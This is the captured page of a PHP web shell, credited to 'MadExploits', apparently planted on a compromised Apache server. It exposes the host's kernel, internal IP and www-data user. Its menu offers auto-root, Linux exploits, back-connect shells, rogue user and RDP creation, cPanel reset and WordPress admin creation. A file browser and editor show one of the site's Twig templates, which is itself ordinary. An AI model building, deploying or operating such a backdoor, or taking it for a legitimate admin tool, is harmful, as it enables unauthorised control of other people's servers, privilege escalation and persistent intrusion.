Linux ip-172-31-33-47 5.4.0-1045-aws #47~18.04.1-Ubuntu SMP Tue Apr 13 15:58:14 UTC 2021 x86_64
Apache/2.4.29 (Ubuntu)
: 172.31.33.47 | : 216.73.216.25
Cant Read [ /etc/named.conf ]
7.4.20
www-data
www.github.com/MadExploits
Terminal
AUTO ROOT
Adminer
Backdoor Destroyer
Linux Exploit
Lock Shell
Lock File
Create User
CREATE RDP
PHP Mailer
BACKCONNECT
UNLOCK SHELL
HASH IDENTIFIER
CPANEL RESET
CREATE WP USER
README
+ Create Folder
+ Create File
/
var /
www /
html /
amply /
templates /
Inventory /
[ HOME SHELL ]
Name
Size
Permission
Action
category.html.twig
1.89
KB
-rw-rw-r--
edititem.html.twig
4.15
KB
-rw-rw-r--
googleda794cd9937527d01.html
39
B
-rw-r--r--
group.html.twig
2
KB
-rw-rw-r--
index.html.twig
0
B
-rw-rw-r--
item.html.twig
1.7
KB
-rw-rw-r--
items.html.twig
5.4
KB
-rw-rw-r--
register.html.twig
1.94
KB
-rw-rw-r--
table.html.twig
1.61
KB
-rw-rw-r--
Delete
Unzip
Zip
${this.title}
Close
Code Editor : group.html.twig
{% extends 'base1.html.twig' %} {% block content %} <div class="content"> <div class="row"> <div class="col-sm-6"> <div class="card"> <div class="card-header"> <h3>Categories</h3> </div> <div class="card-body"> <table class="table table-default"> <thead> <tr> <th>Name</th> <th>Action</th> </tr> </thead> <tbody> {% for category in groups %} <tr> <td><a href="{{ path('group', {'id': category.id }) }}">{{ category.name }}</a></td> <td><a class="btn btn-danger" href="{{ path('deletecategory', {'id': category.id }) }}"><i class="fa fa-times"></i></a></td> </tr> {% endfor %} </tbody> </table> </div> </div> </div> <div class="col-sm-6"> <div class="card"> <div class="card-header"> <h3>{% if group %} <a class="btn btn-primary br-5" href="{{ path('group')}}">New</a> Edit{% else %}New{% endif %} Category</h3> </div> <div class="card-body"> <form action="{{ path('group') }}" method="POST" name="edit"> {% if group %}<input type="hidden" name="edit" value="{{ group.id }}">{% endif %} <div class="form-group"> <input type="text" name="name" class="form-control" placeholder="Category Name" value="{{ group.name|default('') }}" required> </div> <input type="submit" name="submit" value="Save" class="btn btn-primary"> </form> </div> </div> </div> </div> </div> {% endblock %} {% block javascripts %} {{ parent() }} <script> const category_url = "{{ path('group') }}" const itemRow = (category) => ` <tr> <td><a href="${category_url}/${category.id}">${category.name}</a></td> <td class="flex-big"> <a data-name="${category.name}" class="btn btn-danger action-icon delete-row" href="${category_url}/${category.id}"><i class="fa fa-times"></i></a> </td> </tr> `; </script> {#<script src="{{ asset('js/addRemove.js') }}"></script>#} {% endblock %}
Close